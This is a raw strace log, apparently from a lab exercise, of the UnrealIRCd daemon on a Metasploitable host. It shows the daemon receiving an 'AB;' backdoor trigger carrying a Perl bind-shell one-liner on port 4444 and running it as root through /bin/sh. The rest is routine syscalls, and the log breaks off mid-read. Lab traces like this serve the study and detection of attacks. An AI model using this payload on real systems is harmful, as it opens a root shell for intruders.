4519  07:43:37.440212 select(1024, [2 3 4 7 9], [], NULL, {0, 810000}) = 1 (in [4], left {0, 710000})

4519  07:43:37.537588 clock_gettime(CLOCK_MONOTONIC, {3027, 354597079}) = 0

4519  07:43:37.537588 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 44

4519  07:43:37.537588 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537589 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537602 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537617 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537630 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537645 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537658 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537672 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537685 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537699 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537713 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537726 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537740 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537754 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537767 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537781 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537794 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537895 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537937 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537966 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537980 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.537994 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.538012 gettimeofday({1495626217, 538016}, NULL) = 0

4519  07:43:37.538024 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 920000})

4519  07:43:37.624885 clock_gettime(CLOCK_MONOTONIC, {3027, 441908110}) = 0

4519  07:43:37.624911 time(NULL)        = 1495626217

4519  07:43:37.624926 time(NULL)        = 1495626217

4519  07:43:37.624943 gettimeofday({1495626217, 624948}, NULL) = 0

4519  07:43:37.624958 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:43:37.625019 clock_gettime(CLOCK_MONOTONIC, {3027, 442123704}) = 0

4519  07:43:37.625154 gettimeofday({1495626217, 625161}, NULL) = 0

4519  07:43:37.625172 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:43:37.625246 clock_gettime(CLOCK_MONOTONIC, {3027, 442327951}) = 0

4519  07:43:37.625331 accept(2, 0, NULL) = 5

4519  07:43:37.625360 getpeername(5, {sa_family=AF_INET, sin_port=htons(35319), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:37.625405 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:37.625424 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:37.625444 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:37.625463 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:37.625479 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:37.625496 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:37.625513 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:37.625536 clock_gettime(CLOCK_MONOTONIC, {3027, 442553139}) = 0

4519  07:43:37.625555 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:37.625573 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:37.625597 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:37.625651 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:37.625668 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:37.625688 send(6, "\240\255\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:37.625742 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:37.625764 gettimeofday({1495626217, 625768}, NULL) = 0

4519  07:43:37.625776 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:43:37.628153 clock_gettime(CLOCK_MONOTONIC, {3027, 445169091}) = 0

4519  07:43:37.628168 recvfrom(6, "\240\255\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\0\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:37.628209 close(6)          = 0

4519  07:43:37.628223 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:37.628237 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:43:37.628341 time(NULL)        = 1495626217

4519  07:43:37.628373 time(NULL)        = 1495626217

4519  07:43:37.628401 gettimeofday({1495626217, 628405}, NULL) = 0

4519  07:43:37.628413 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:37.628442 clock_gettime(CLOCK_MONOTONIC, {3027, 445454681}) = 0

4519  07:43:37.628452 gettimeofday({1495626217, 628456}, NULL) = 0

4519  07:43:37.628462 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 890000})

4519  07:43:37.737664 clock_gettime(CLOCK_MONOTONIC, {3027, 554672853}) = 0

4519  07:43:37.737664 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 70

4519  07:43:37.737664 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737664 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737665 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737665 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737665 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737665 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737676 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737690 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737703 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737717 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737730 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737743 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737756 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737775 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737789 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737802 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737815 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737828 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737854 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737896 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737917 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737944 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:37.737960 gettimeofday({1495626217, 737964}, NULL) = 0

4519  07:43:37.737972 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:37.738013 clock_gettime(CLOCK_MONOTONIC, {3027, 555025877}) = 0

4519  07:43:37.738025 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:37.738052 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:37.738072 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:37.738084 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:37.738099 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12683

12683 07:43:37.738165 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12683 07:43:37.738179 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12683 07:43:37.738190 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12683 07:43:37.738203 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12683 07:43:37.738311 brk(0)            = 0x80f9000

12683 07:43:37.738333 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.738359 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f50000

12683 07:43:37.738420 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.738439 open("/etc/ld.so.cache", O_RDONLY) = 1

12683 07:43:37.738452 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12683 07:43:37.738472 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f48000

12683 07:43:37.738482 close(1)          = 0

12683 07:43:37.738506 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.738521 open("/lib/libncurses.so.5", O_RDONLY) = 1

12683 07:43:37.738534 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12683 07:43:37.738626 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12683 07:43:37.738643 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f18000

12683 07:43:37.738655 mmap2(0xb7f45000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f45000

12683 07:43:37.738671 close(1)          = 0

12683 07:43:37.738683 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.738696 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12683 07:43:37.738710 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12683 07:43:37.738802 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12683 07:43:37.738818 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f14000

12683 07:43:37.738829 mmap2(0xb7f16000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f16000

12683 07:43:37.738856 close(1)          = 0

12683 07:43:37.738914 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.738943 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12683 07:43:37.738957 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12683 07:43:37.739058 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12683 07:43:37.739075 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f13000

12683 07:43:37.739088 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc4000

12683 07:43:37.739099 mmap2(0xb7f0d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f0d000

12683 07:43:37.739113 mmap2(0xb7f10000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f10000

12683 07:43:37.739127 close(1)          = 0

12683 07:43:37.739148 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dc3000

12683 07:43:37.739160 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dc36b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12683 07:43:37.739214 mprotect(0xb7f0d000, 4096, PROT_READ) = 0

12683 07:43:37.739250 munmap(0xb7f48000, 29913) = 0

12683 07:43:37.739276 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.739290 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12683 07:43:37.739308 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfc82640) = -1 ENOTTY (Inappropriate ioctl for device)

12683 07:43:37.739353 brk(0)            = 0x80f9000

12683 07:43:37.739391 brk(0x80fa000)    = 0x80fa000

12683 07:43:37.739403 brk(0x80fb000)    = 0x80fb000

12683 07:43:37.739434 getuid32()        = 0

12683 07:43:37.739443 getgid32()        = 0

12683 07:43:37.739452 geteuid32()       = 0

12683 07:43:37.739461 getegid32()       = 0

12683 07:43:37.739474 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.739487 time(NULL)        = 1495626217

12683 07:43:37.739499 brk(0x80fc000)    = 0x80fc000

12683 07:43:37.739514 brk(0x80fd000)    = 0x80fd000

12683 07:43:37.739532 open("/proc/meminfo", O_RDONLY) = 1

12683 07:43:37.739553 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12683 07:43:37.739571 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4f000

12683 07:43:37.739582 read(1, "MemTotal:      1035240 kB\nMemFree:        306660 kB\nBuffers:         89660 kB\nCached:         477424 kB\nSwapCached:          0 kB\nActive:         258188 kB\nInactive:       437828 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        306420 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5076 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            21244 kB\nSReclaimable:    12376 kB\nSUnreclaim:       8868 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12683 07:43:37.739665 close(1)          = 0

12683 07:43:37.739676 munmap(0xb7f4f000, 4096) = 0

12683 07:43:37.739687 brk(0x80fe000)    = 0x80fe000

12683 07:43:37.739713 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12683 07:43:37.739726 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12683 07:43:37.739738 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12683 07:43:37.739750 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12683 07:43:37.739761 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12683 07:43:37.739773 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12683 07:43:37.739786 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12683 07:43:37.739797 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12683 07:43:37.739809 uname({sys="Linux", node="metasploitable", ...}) = 0

12683 07:43:37.739895 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12683 07:43:37.739927 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12683 07:43:37.739945 brk(0x8100000)    = 0x8100000

12683 07:43:37.739956 getcwd("/etc/unreal", 4096) = 12

12683 07:43:37.739970 getpid()          = 12683

12683 07:43:37.739986 getppid()         = 4519

12683 07:43:37.740001 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12683 07:43:37.740021 stat64("/sbin/sh", 0xbfc82618) = -1 ENOENT (No such file or directory)

12683 07:43:37.740033 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12683 07:43:37.740050 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12683 07:43:37.740073 socket(PF_FILE, SOCK_STREAM, 0) = 1

12683 07:43:37.740085 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12683 07:43:37.740097 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12683 07:43:37.740118 close(1)          = 0

12683 07:43:37.740130 socket(PF_FILE, SOCK_STREAM, 0) = 1

12683 07:43:37.740139 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12683 07:43:37.740149 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12683 07:43:37.740167 close(1)          = 0

12683 07:43:37.740180 open("/etc/nsswitch.conf", O_RDONLY) = 1

12683 07:43:37.740194 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12683 07:43:37.740210 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4f000

12683 07:43:37.740224 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12683 07:43:37.740272 read(1, "", 4096) = 0

12683 07:43:37.740281 close(1)          = 0

12683 07:43:37.740290 munmap(0xb7f4f000, 4096) = 0

12683 07:43:37.740306 open("/etc/ld.so.cache", O_RDONLY) = 1

12683 07:43:37.740318 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12683 07:43:37.740344 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f48000

12683 07:43:37.740384 close(1)          = 0

12683 07:43:37.740395 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12683 07:43:37.740439 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12683 07:43:37.740454 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 